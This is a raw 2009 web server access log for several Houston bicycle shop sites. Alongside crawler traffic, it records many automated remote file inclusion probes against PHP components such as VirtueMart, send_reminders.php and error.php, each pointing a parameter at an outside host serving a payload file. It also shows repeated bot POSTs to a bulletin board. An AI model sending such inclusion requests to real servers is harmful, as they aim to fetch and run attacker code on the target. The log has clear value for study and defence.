87.106.76.218 - - [10/Jun/2009:10:06:33 -0700] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.megaraskrutka.ru/icf.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "houstonbikeshop.com"
87.106.76.218 - - [10/Jun/2009:10:08:26 -0700] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.megaraskrutka.ru/icf.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "houstonbikeshop.com"
204.62.53.203 - - [10/Jun/2009:10:11:09 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" "www.svbikes.com"
204.62.53.203 - - [10/Jun/2009:10:14:25 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" "www.svbikes.com"
204.62.53.203 - - [10/Jun/2009:10:14:26 -0700] "GET /logs?S=A HTTP/1.1" 301 95 "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" "www.svbikes.com"
204.62.53.203 - - [10/Jun/2009:10:15:15 -0700] "GET /logs/?S=A HTTP/1.1" 200 2368 "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" "www.svbikes.com"
204.62.53.203 - - [10/Jun/2009:10:16:11 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" "www.svbikes.com"
204.62.53.203 - - [10/Jun/2009:10:16:18 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" "www.svbikes.com"
204.62.53.203 - - [10/Jun/2009:10:16:18 -0700] "GET /?D=D HTTP/1.1" 200 1764 "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" "www.svbikes.com"
204.62.53.203 - - [10/Jun/2009:10:16:47 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" "www.svbikes.com"
204.62.53.203 - - [10/Jun/2009:10:16:54 -0700] "GET /tmp?M=A HTTP/1.1" 301 94 "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" "www.svbikes.com"
204.62.53.203 - - [10/Jun/2009:10:16:55 -0700] "GET /tmp/?M=A HTTP/1.1" 200 659 "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" "www.svbikes.com"
62.140.23.185 - - [10/Jun/2009:10:20:00 -0700] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://www.bildpunktlinden.de//components/com_sef/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
62.140.23.185 - - [10/Jun/2009:10:20:03 -0700] "GET /skin/zero_vote/error.php?dir=http://www.bildpunktlinden.de//components/com_sef/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
62.140.23.185 - - [10/Jun/2009:10:20:04 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.bildpunktlinden.de//components/com_sef/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
204.62.53.203 - - [10/Jun/2009:10:30:46 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" "www.svbikes.com"
89.223.3.98 - - [10/Jun/2009:10:32:59 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.proektov.ru/v5id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
89.223.3.98 - - [10/Jun/2009:10:32:59 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.proektov.ru/v5id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
89.223.3.98 - - [10/Jun/2009:10:32:59 -0700] "GET /logs/access.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.proektov.ru/v5id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
204.62.53.203 - - [10/Jun/2009:10:35:30 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" "www.svbikes.com"
89.223.3.98 - - [10/Jun/2009:10:37:01 -0700] "GET /logs/access.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.proektov.ru/v5id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
72.36.134.234 - - [10/Jun/2009:10:41:50 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://sunandsea.co.kr/upload/ManieZ.jpg???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "houstonbikeshop.com"
72.36.134.234 - - [10/Jun/2009:10:41:50 -0700] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://sunandsea.co.kr/upload/ManieZ.jpg???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "houstonbikeshop.com"
72.36.134.234 - - [10/Jun/2009:10:42:14 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://sunandsea.co.kr/upload/ManieZ.jpg???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.svbikes.com"
72.36.134.234 - - [10/Jun/2009:10:42:14 -0700] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://sunandsea.co.kr/upload/ManieZ.jpg???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.svbikes.com"
72.36.134.234 - - [10/Jun/2009:10:42:24 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://sunandsea.co.kr/upload/ManieZ.jpg???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "bicyclestoreshouston.com"
72.36.134.234 - - [10/Jun/2009:10:42:24 -0700] "GET /translations/Turkish.txt//tools/send_reminders.php?noSet=0&includedir=http://sunandsea.co.kr/upload/ManieZ.jpg???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "bicyclestoreshouston.com"
72.36.134.234 - - [10/Jun/2009:10:42:24 -0700] "GET /translations/Finnish.txt//tools/send_reminders.php?noSet=0&includedir=http://sunandsea.co.kr/upload/ManieZ.jpg???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "bicyclestoreshouston.com"
72.36.134.234 - - [10/Jun/2009:10:42:24 -0700] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://sunandsea.co.kr/upload/ManieZ.jpg???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "bicyclestoreshouston.com"
204.62.53.203 - - [10/Jun/2009:10:42:27 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" "www.svbikes.com"
72.36.134.234 - - [10/Jun/2009:10:42:28 -0700] "GET /translations/Swedish.txt//tools/send_reminders.php?noSet=0&includedir=http://sunandsea.co.kr/upload/ManieZ.jpg???? HTTP/1.0" 404 275 "-" "libwww-perl/5.811" "houstonbikeshop.com"
72.36.134.234 - - [10/Jun/2009:10:42:28 -0700] "GET /translations/Hungarian.txt//tools/send_reminders.php?noSet=0&includedir=http://sunandsea.co.kr/upload/ManieZ.jpg???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "houstonbikeshop.com"
72.36.134.234 - - [10/Jun/2009:10:42:34 -0700] "GET /translations/Portuguese_BR.txt//tools/send_reminders.php?noSet=0&includedir=http://sunandsea.co.kr/upload/ManieZ.jpg???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.svbikes.com"
204.62.53.203 - - [10/Jun/2009:10:42:40 -0700] "GET /logs?N=D HTTP/1.1" 301 95 "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" "www.svbikes.com"
204.62.53.203 - - [10/Jun/2009:10:42:42 -0700] "GET /logs/?N=D HTTP/1.1" 200 2368 "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" "www.svbikes.com"
204.62.53.203 - - [10/Jun/2009:10:44:13 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" "www.svbikes.com"
77.243.235.164 - - [10/Jun/2009:10:48:01 -0700] "GET /logs/access.log%20%20//skin/zero_vote/error.php?dir=http://www.mistrider.com/samphpwebkk/images/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
77.243.235.164 - - [10/Jun/2009:10:48:01 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.mistrider.com/samphpwebkk/images/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
77.243.235.164 - - [10/Jun/2009:10:48:04 -0700] "GET /skin/zero_vote/error.php?dir=http://www.mistrider.com/samphpwebkk/images/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
77.243.235.164 - - [10/Jun/2009:10:48:17 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.mistrider.com/samphpwebkk/images/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
77.243.235.164 - - [10/Jun/2009:10:48:17 -0700] "GET /logs/access.log%20%20//skin/zero_vote/error.php?dir=http://www.mistrider.com/samphpwebkk/images/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
77.243.235.164 - - [10/Jun/2009:10:48:17 -0700] "GET /skin/zero_vote/error.php?dir=http://www.mistrider.com/samphpwebkk/images/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
204.62.53.203 - - [10/Jun/2009:10:48:47 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" "www.svbikes.com"
77.243.235.164 - - [10/Jun/2009:10:49:12 -0700] "GET /skin/zero_vote/error.php?dir=http://www.mistrider.com/samphpwebkk/images/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
77.243.235.164 - - [10/Jun/2009:10:49:12 -0700] "GET /logs/access.log%20%20//skin/zero_vote/error.php?dir=http://www.mistrider.com/samphpwebkk/images/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
77.243.235.164 - - [10/Jun/2009:10:49:15 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.mistrider.com/samphpwebkk/images/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
200.142.148.142 - - [10/Jun/2009:10:49:54 -0700] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://www.sanagustin.edu.bo/modules/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "houstonbikeshop.com"
200.142.148.142 - - [10/Jun/2009:10:49:56 -0700] "GET /skin/zero_vote/error.php?dir=http://www.sanagustin.edu.bo/modules/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "houstonbikeshop.com"
200.142.148.142 - - [10/Jun/2009:10:49:59 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.sanagustin.edu.bo/modules/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "houstonbikeshop.com"
216.14.117.22 - - [10/Jun/2009:10:52:03 -0700] "GET /logs/access.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.teampoint-koeln.de/images/cek.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.820" "houstonbikeshop.com"
216.14.117.22 - - [10/Jun/2009:10:52:07 -0700] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.teampoint-koeln.de/images/cek.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.820" "houstonbikeshop.com"
216.14.117.22 - - [10/Jun/2009:10:52:07 -0700] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.teampoint-koeln.de/images/cek.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.820" "houstonbikeshop.com"
70.85.165.10 - - [10/Jun/2009:10:53:20 -0700] "GET /logs/access.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.teampoint-koeln.de/images/cek.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "houstonbikeshop.com"
70.85.165.10 - - [10/Jun/2009:10:53:23 -0700] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.teampoint-koeln.de/images/cek.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "houstonbikeshop.com"
70.85.165.10 - - [10/Jun/2009:10:53:23 -0700] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.teampoint-koeln.de/images/cek.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "houstonbikeshop.com"
66.232.143.238 - - [10/Jun/2009:11:00:10 -0700] "GET /logs/access.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.teampoint-koeln.de/images/cek.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "houstonbikeshop.com"
66.232.143.238 - - [10/Jun/2009:11:00:10 -0700] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.teampoint-koeln.de/images/cek.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "houstonbikeshop.com"
66.232.143.238 - - [10/Jun/2009:11:00:11 -0700] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.teampoint-koeln.de/images/cek.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "houstonbikeshop.com"
204.62.53.203 - - [10/Jun/2009:11:00:15 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" "www.svbikes.com"
218.246.20.221 - - [10/Jun/2009:11:03:06 -0700] "GET /translations/Turkish.txt%20%20//tools/send_reminders.php?includedir=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
218.246.20.221 - - [10/Jun/2009:11:03:06 -0700] "GET /translations//tools/send_reminders.php?includedir=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
218.246.20.221 - - [10/Jun/2009:11:03:57 -0700] "GET /translations/Spanish.txt%20%20//tools/send_reminders.php?includedir=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
91.121.150.170 - - [10/Jun/2009:11:04:43 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.svbikes.com"
75.148.147.125 - - [10/Jun/2009:11:06:56 -0700] "GET / HTTP/1.1" 200 1764 "http://locator.trekbikes.com/locator/search" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-us) AppleWebKit/525.27.1 (KHTML, like Gecko) Version/3.2.1 Safari/525.27.1" "www.svbikes.com"
75.148.147.125 - - [10/Jun/2009:11:06:56 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "http://www.svbikes.com/" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-us) AppleWebKit/525.27.1 (KHTML, like Gecko) Version/3.2.1 Safari/525.27.1" "www.svbikes.com"
75.148.147.125 - - [10/Jun/2009:11:07:09 -0700] "GET / HTTP/1.1" 200 1764 "http://locator.trekbikes.com/locator/search" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-us) AppleWebKit/525.27.1 (KHTML, like Gecko) Version/3.2.1 Safari/525.27.1" "www.svbikes.com"
204.62.53.203 - - [10/Jun/2009:11:08:17 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" "www.svbikes.com"
204.62.53.203 - - [10/Jun/2009:11:11:29 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" "www.svbikes.com"
204.62.53.203 - - [10/Jun/2009:11:13:29 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" "www.svbikes.com"
65.55.106.208 - - [10/Jun/2009:11:13:57 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.svbikes.com"
91.121.150.170 - - [10/Jun/2009:11:18:43 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "bicyclestoreshouston.com"
91.121.150.170 - - [10/Jun/2009:11:19:26 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "bicyclestoreshouston.com"
91.121.150.170 - - [10/Jun/2009:11:24:54 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "houstonbikeshop.com"
91.121.150.170 - - [10/Jun/2009:11:25:15 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "houstonbikeshop.com"
62.149.15.68 - - [10/Jun/2009:11:25:50 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://jasek3.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
62.149.15.68 - - [10/Jun/2009:11:25:50 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://jasek3.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
62.149.15.68 - - [10/Jun/2009:11:25:50 -0700] "GET /logs/access.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://jasek3.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
204.62.53.203 - - [10/Jun/2009:11:28:07 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" "www.svbikes.com"
91.121.150.170 - - [10/Jun/2009:11:33:03 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.svbikes.com"
204.62.53.203 - - [10/Jun/2009:11:37:11 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" "www.svbikes.com"
81.19.66.38 - - [10/Jun/2009:11:40:24 -0700] "GET /bullitinboard/viewtopic.php?p=1625 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
81.19.66.38 - - [10/Jun/2009:11:40:25 -0700] "GET /bullitinboard/viewtopic.php?p=1663 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
81.19.66.38 - - [10/Jun/2009:11:40:25 -0700] "GET /bullitinboard/viewtopic.php?p=1968 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
81.19.66.38 - - [10/Jun/2009:11:40:26 -0700] "GET /bullitinboard/viewtopic.php?p=1972 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
81.19.66.38 - - [10/Jun/2009:11:40:30 -0700] "GET /bullitinboard/viewtopic.php?p=1624 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
62.149.15.68 - - [10/Jun/2009:11:42:31 -0700] "GET /logs/access.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://jasek3.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
91.121.150.170 - - [10/Jun/2009:11:46:54 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "bicyclestoreshouston.com"
204.62.53.203 - - [10/Jun/2009:11:49:09 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" "www.svbikes.com"
204.62.53.203 - - [10/Jun/2009:11:49:37 -0700] "GET /bullitinboard HTTP/1.1" 301 100 "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" "www.svbikes.com"
204.62.53.203 - - [10/Jun/2009:11:49:42 -0700] "GET /bullitinboard/ HTTP/1.1" 200 533 "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" "www.svbikes.com"
91.121.150.170 - - [10/Jun/2009:11:53:11 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "houstonbikeshop.com"
78.41.205.41 - - [10/Jun/2009:12:06:34 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.startenglish.com.br/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
78.41.205.41 - - [10/Jun/2009:12:06:34 -0700] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://www.startenglish.com.br/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
78.41.205.41 - - [10/Jun/2009:12:06:38 -0700] "GET /translations/Spanish.txt%20%20//tools/send_reminders.php?noSet=0&includedir=http://www.startenglish.com.br/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
78.41.205.41 - - [10/Jun/2009:12:06:43 -0700] "GET /translations/Finnish.txt%20%20//tools/send_reminders.php?noSet=0&includedir=http://www.startenglish.com.br/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
78.41.205.41 - - [10/Jun/2009:12:07:16 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.startenglish.com.br/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
78.41.205.41 - - [10/Jun/2009:12:07:16 -0700] "GET /translations/Italian.txt%20%20//tools/send_reminders.php?noSet=0&includedir=http://www.startenglish.com.br/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
78.41.205.41 - - [10/Jun/2009:12:07:16 -0700] "GET /translations/Hungarian.txt%20%20//tools/send_reminders.php?noSet=0&includedir=http://www.startenglish.com.br/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
78.41.205.41 - - [10/Jun/2009:12:07:16 -0700] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://www.startenglish.com.br/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
78.41.205.41 - - [10/Jun/2009:12:08:02 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.startenglish.com.br/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
78.41.205.41 - - [10/Jun/2009:12:08:02 -0700] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://www.startenglish.com.br/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
78.41.205.41 - - [10/Jun/2009:12:08:05 -0700] "GET /translations/Spanish.txt//tools/send_reminders.php?noSet=0&includedir=http://www.startenglish.com.br/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
78.41.205.41 - - [10/Jun/2009:12:08:05 -0700] "GET /translations/Finnish.txt//tools/send_reminders.php?noSet=0&includedir=http://www.startenglish.com.br/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
204.62.53.203 - - [10/Jun/2009:12:15:06 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" "www.svbikes.com"
204.62.53.203 - - [10/Jun/2009:12:17:24 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" "www.svbikes.com"
204.62.53.203 - - [10/Jun/2009:12:18:33 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" "www.svbikes.com"
204.62.53.203 - - [10/Jun/2009:12:18:45 -0700] "GET /tmp?N=D HTTP/1.1" 301 94 "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" "www.svbikes.com"
204.62.53.203 - - [10/Jun/2009:12:18:50 -0700] "GET /tmp/?N=D HTTP/1.1" 200 659 "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" "www.svbikes.com"
64.246.22.60 - - [10/Jun/2009:12:18:52 -0700] "GET /translations/Spanish.txt//tools/send_reminders.php?noSet=0&includedir=http://www.collegedalfred.ca/upload/documents/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "bicyclestoreshouston.com"
64.246.22.60 - - [10/Jun/2009:12:18:52 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.collegedalfred.ca/upload/documents/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "bicyclestoreshouston.com"
64.246.22.60 - - [10/Jun/2009:12:18:52 -0700] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://www.collegedalfred.ca/upload/documents/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "bicyclestoreshouston.com"
64.246.22.60 - - [10/Jun/2009:12:20:27 -0700] "GET /translations/Finnish.txt//tools/send_reminders.php?noSet=0&includedir=http://www.collegedalfred.ca/upload/documents/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "bicyclestoreshouston.com"
91.121.150.170 - - [10/Jun/2009:12:24:14 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.svbikes.com"
64.246.22.60 - - [10/Jun/2009:12:24:59 -0700] "GET /translations/Hungarian.txt//tools/send_reminders.php?noSet=0&includedir=http://www.collegedalfred.ca/upload/documents/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "houstonbikeshop.com"
64.246.22.60 - - [10/Jun/2009:12:24:59 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.collegedalfred.ca/upload/documents/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "houstonbikeshop.com"
64.246.22.60 - - [10/Jun/2009:12:25:00 -0700] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://www.collegedalfred.ca/upload/documents/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "houstonbikeshop.com"
64.246.22.60 - - [10/Jun/2009:12:25:03 -0700] "GET /translations/Italian.txt//tools/send_reminders.php?noSet=0&includedir=http://www.collegedalfred.ca/upload/documents/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "houstonbikeshop.com"
65.55.106.208 - - [10/Jun/2009:12:28:30 -0700] "GET /logs/?N=A HTTP/1.1" 200 2368 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.svbikes.com"
